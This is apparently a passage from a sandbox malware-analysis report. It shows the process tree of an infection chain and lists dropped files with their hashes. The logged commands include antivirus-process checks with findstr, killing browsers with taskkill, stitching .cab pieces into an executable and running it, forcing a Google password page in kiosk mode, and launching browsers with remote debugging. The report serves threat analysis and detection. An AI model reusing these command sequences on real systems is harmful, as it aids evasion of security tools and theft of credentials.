                                                    "C:\Users\Admin\AppData\Local\Temp\10337960101\d5e3ea69b4.exe"
                                                    3⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    • Checks processor information in registry
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:10980
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                      4⤵
                                                      • Uses browser remote debugging
                                                      • Enumerates system info in registry
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of FindShellTrayWindow
                                                      PID:11500
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffb076dcf8,0x7fffb076dd04,0x7fffb076dd10
                                                        5⤵
                                                          PID:11540
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1932,i,16867859896798777901,565534595447294613,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1928 /prefetch:2
                                                          5⤵
                                                            PID:11964
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2248,i,16867859896798777901,565534595447294613,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2264 /prefetch:3
                                                            5⤵
                                                              PID:12016
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2364,i,16867859896798777901,565534595447294613,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2392 /prefetch:8
                                                              5⤵
                                                                PID:5484
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3252,i,16867859896798777901,565534595447294613,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3264 /prefetch:1
                                                                5⤵
                                                                • Uses browser remote debugging
                                                                PID:12364
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3460,i,16867859896798777901,565534595447294613,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3500 /prefetch:1
                                                                5⤵
                                                                • Uses browser remote debugging
                                                                PID:12356
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4432,i,16867859896798777901,565534595447294613,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4448 /prefetch:2
                                                                5⤵
                                                                • Uses browser remote debugging
                                                                PID:12684
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4672,i,16867859896798777901,565534595447294613,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4688 /prefetch:1
                                                                5⤵
                                                                • Uses browser remote debugging
                                                                PID:12764
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
                                                              4⤵
                                                              • Uses browser remote debugging
                                                              • Enumerates system info in registry
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:7672
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x214,0x2b8,0x7fffadb5f208,0x7fffadb5f214,0x7fffadb5f220
                                                                5⤵
                                                                  PID:8636
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1928,i,14464318084210189389,10499291884795453229,262144 --variations-seed-version --mojo-platform-channel-handle=1924 /prefetch:2
                                                                  5⤵
                                                                    PID:4592
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=2120,i,14464318084210189389,10499291884795453229,262144 --variations-seed-version --mojo-platform-channel-handle=2112 /prefetch:3
                                                                    5⤵
                                                                      PID:8660
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2564,i,14464318084210189389,10499291884795453229,262144 --variations-seed-version --mojo-platform-channel-handle=2584 /prefetch:8
                                                                      5⤵
                                                                        PID:7700
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3556,i,14464318084210189389,10499291884795453229,262144 --variations-seed-version --mojo-platform-channel-handle=3572 /prefetch:1
                                                                        5⤵
                                                                        • Uses browser remote debugging
                                                                        PID:952
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3564,i,14464318084210189389,10499291884795453229,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:1
                                                                        5⤵
                                                                        • Uses browser remote debugging
                                                                        PID:3512
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4208,i,14464318084210189389,10499291884795453229,262144 --variations-seed-version --mojo-platform-channel-handle=4284 /prefetch:1
                                                                        5⤵
                                                                        • Uses browser remote debugging
                                                                        PID:8268
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4244,i,14464318084210189389,10499291884795453229,262144 --variations-seed-version --mojo-platform-channel-handle=4288 /prefetch:2
                                                                        5⤵
                                                                        • Uses browser remote debugging
                                                                        PID:8252
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5212,i,14464318084210189389,10499291884795453229,262144 --variations-seed-version --mojo-platform-channel-handle=5184 /prefetch:8
                                                                        5⤵
                                                                          PID:13136
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5256,i,14464318084210189389,10499291884795453229,262144 --variations-seed-version --mojo-platform-channel-handle=5332 /prefetch:8
                                                                          5⤵
                                                                            PID:12808
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5236,i,14464318084210189389,10499291884795453229,262144 --variations-seed-version --mojo-platform-channel-handle=5336 /prefetch:8
                                                                            5⤵
                                                                              PID:5784
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5200,i,14464318084210189389,10499291884795453229,262144 --variations-seed-version --mojo-platform-channel-handle=5536 /prefetch:8
                                                                              5⤵
                                                                                PID:5732
                                                                          • C:\Users\Admin\AppData\Local\Temp\10337970101\b969c99e16.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\10337970101\b969c99e16.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            • Suspicious use of SendNotifyMessage
                                                                            PID:12572
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /F /IM firefox.exe /T
                                                                              4⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Kills process with taskkill
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:12796
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /F /IM chrome.exe /T
                                                                              4⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Kills process with taskkill
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:6112
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /F /IM msedge.exe /T
                                                                              4⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Kills process with taskkill
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4888
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /F /IM opera.exe /T
                                                                              4⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Kills process with taskkill
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4064
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /F /IM brave.exe /T
                                                                              4⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Kills process with taskkill
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:6288
                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                              4⤵
                                                                                PID:6008
                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                  5⤵
                                                                                  • Checks processor information in registry
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  • Suspicious use of SendNotifyMessage
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:2116
                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2084 -initialChannelId {76c61d76-b31a-4fbe-a06e-f2773a27c559} -parentPid 2116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2116" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                                                    6⤵
                                                                                      PID:7052
                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2508 -initialChannelId {07853133-3134-4c04-822a-b7fb095a92ab} -parentPid 2116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                                      6⤵
                                                                                        PID:4828
                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3784 -prefsLen 25164 -prefMapHandle 3788 -prefMapSize 270279 -jsInitHandle 3792 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3800 -initialChannelId {2edf7c06-6367-4ad1-b384-5e95c39acb3e} -parentPid 2116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                                        6⤵
                                                                                        • Checks processor information in registry
                                                                                        PID:776
                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3956 -prefsLen 27276 -prefMapHandle 3960 -prefMapSize 270279 -ipcHandle 4052 -initialChannelId {d8728fc8-a770-487d-bfa7-114c13f914db} -parentPid 2116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2116" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                                        6⤵
                                                                                          PID:8300
                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4528 -prefsLen 34775 -prefMapHandle 4532 -prefMapSize 270279 -jsInitHandle 4536 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4544 -initialChannelId {eaa568fb-a6fa-41e1-b77b-bb3aafbc3285} -parentPid 2116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                                          6⤵
                                                                                          • Checks processor information in registry
                                                                                          PID:9312
                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5136 -prefsLen 35012 -prefMapHandle 5140 -prefMapSize 270279 -ipcHandle 5148 -initialChannelId {f5da60b5-1258-4e67-b3a5-b032aeb35536} -parentPid 2116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                                          6⤵
                                                                                          • Checks processor information in registry
                                                                                          PID:6960
                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5368 -prefsLen 32952 -prefMapHandle 5372 -prefMapSize 270279 -jsInitHandle 5376 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5388 -initialChannelId {3d38fe74-6fa5-4aae-a1e1-e2a40d86431d} -parentPid 2116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                                          6⤵
                                                                                          • Checks processor information in registry
                                                                                          PID:4876
                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5400 -prefsLen 32952 -prefMapHandle 5404 -prefMapSize 270279 -jsInitHandle 5408 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5420 -initialChannelId {18f3f7b7-ec95-403e-828b-4fc1a6464f5e} -parentPid 2116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                                          6⤵
                                                                                          • Checks processor information in registry
                                                                                          PID:7072
                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5780 -prefsLen 32952 -prefMapHandle 5784 -prefMapSize 270279 -jsInitHandle 5788 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5756 -initialChannelId {70560cdc-d394-4316-a389-8a829bb57433} -parentPid 2116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                                          6⤵
                                                                                          • Checks processor information in registry
                                                                                          PID:7108
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10337980101\8b610ed21e.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10337980101\8b610ed21e.exe"
                                                                                    3⤵
                                                                                    • Modifies Windows Defender DisableAntiSpyware settings
                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                    • Modifies Windows Defender TamperProtection settings
                                                                                    • Modifies Windows Defender notification settings
                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                    • Checks BIOS information in registry
                                                                                    • Executes dropped EXE
                                                                                    • Identifies Wine through registry keys
                                                                                    • Windows security modification
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:6256
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10337990101\f73ae_003.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10337990101\f73ae_003.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:7120
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10338000101\7IIl2eE.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10338000101\7IIl2eE.exe"
                                                                                    3⤵
                                                                                      PID:5240
                                                                                      • C:\Windows\SysWOW64\CMD.exe
                                                                                        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                                                        4⤵
                                                                                          PID:5824
                                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                                            tasklist
                                                                                            5⤵
                                                                                            • Enumerates processes with tasklist
                                                                                            PID:13232
                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                            findstr /I "opssvc wrsa"
                                                                                            5⤵
                                                                                              PID:13292
                                                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                                                              tasklist
                                                                                              5⤵
                                                                                              • Enumerates processes with tasklist
                                                                                              PID:6728
                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                              findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                                              5⤵
                                                                                                PID:2560
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /c md 418377
                                                                                                5⤵
                                                                                                  PID:6224
                                                                                                • C:\Windows\SysWOW64\extrac32.exe
                                                                                                  extrac32 /Y /E Leon.cab
                                                                                                  5⤵
                                                                                                    PID:6736
                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                    findstr /V "BEVERAGES" Compilation
                                                                                                    5⤵
                                                                                                      PID:10100
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                                                                                                      5⤵
                                                                                                        PID:9716
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                                                                                                        5⤵
                                                                                                          PID:10556
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                                                                                                          Passwords.com N
                                                                                                          5⤵
                                                                                                            PID:10724
                                                                                                          • C:\Windows\SysWOW64\choice.exe
                                                                                                            choice /d y /t 5
                                                                                                            5⤵
                                                                                                              PID:11148
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                      1⤵
                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Executes dropped EXE
                                                                                                      • Identifies Wine through registry keys
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      PID:5576
                                                                                                    • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                      1⤵
                                                                                                        PID:12032
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                        1⤵
                                                                                                          PID:7836
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                          1⤵
                                                                                                            PID:11252

                                                                                                          Network

                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                          Replay Monitor

                                                                                                          Loading Replay Monitor...

                                                                                                          Downloads

                                                                                                          • C:\KVRT2020_Data\Temp\7C924DD4D20055C80007791130E2D03F\klupd_9c4d2b28a_arkmon.sys

                                                                                                            Filesize

                                                                                                            390KB

                                                                                                            MD5

                                                                                                            7c924dd4d20055c80007791130e2d03f

                                                                                                            SHA1

                                                                                                            072f004ddcc8ddf12aba64e09d7ee0ce3030973e

                                                                                                            SHA256

                                                                                                            406ab7d6e45dbedcfbd2d7376a643620c7462cece3e41115c8fbc07861177ec6

                                                                                                            SHA512

                                                                                                            ab26005da50cbf1f45129834cb661b5b97aed5637d4ebc9821c8b744ff61c3f108f423ae5628602d99b3d859e184bfb23900797538dca2891186321d832ea806

                                                                                                          • C:\ProgramData\mozglue.dll

                                                                                                            Filesize

                                                                                                            593KB

                                                                                                            MD5

                                                                                                            c8fd9be83bc728cc04beffafc2907fe9

                                                                                                            SHA1

                                                                                                            95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                            SHA256

                                                                                                            ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                            SHA512

                                                                                                            fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                          • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe

                                                                                                            Filesize

                                                                                                            1.9MB

                                                                                                            MD5

                                                                                                            acb40d712d1158cde87a02cb4f16b4d4

                                                                                                            SHA1

                                                                                                            1d2d469b6694306de77879f0c78b024c2847f8ac

                                                                                                            SHA256

                                                                                                            93a5dc1be8f236795c111d119ba8d2255371205b34bba51c92551076ce927c1a

                                                                                                            SHA512

                                                                                                            586ac2e752c9dfacf5d49ba4fcd1ca497ea919d427547fdc38b0245bbfffb5cfcf3237c24411ff9df2d61f9365eebc9fc7cdfe7743f5e8d34a578a122005a80e

                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                            Filesize

                                                                                                            2B

                                                                                                            MD5

                                                                                                            d751713988987e9331980363e24189ce

                                                                                                            SHA1

                                                                                                            97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                            SHA256

                                                                                                            4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                            SHA512

                                                                                                            b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                            Filesize

                                                                                                            80KB

                                                                                                            MD5

                                                                                                            9db3915f2baebfe66af06d649fe324de

                                                                                                            SHA1

                                                                                                            30951839381e49179a04367b51bba8f2501f2a46

                                                                                                            SHA256

                                                                                                            91472e94fe0f52d22d428cd296144c48038a9f7995992ad69c8df20f22669ca3

                                                                                                            SHA512

                                                                                                            1eee4c512f39d7e3b264dfb7523b2b68ea7f28a168e4a8998bb354c08de97aebfb089239e95d136db838f1d11086e257b81754266237a7e12254c0d0cf588081

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                            Filesize

                                                                                                            2KB

                                                                                                            MD5

                                                                                                            d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                            SHA1

                                                                                                            31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                            SHA256

                                                                                                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                            SHA512

                                                                                                            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                            Filesize

                                                                                                            280B

                                                                                                            MD5

                                                                                                            fed4ab68611c6ce720965bcb5dfbf546

                                                                                                            SHA1

                                                                                                            af33fc71721625645993be6fcba5c5852e210864

                                                                                                            SHA256

                                                                                                            c41acdf5d0a01d5e9720ef9f6d503099950791b6f975ba698ccd013c4defa8c4

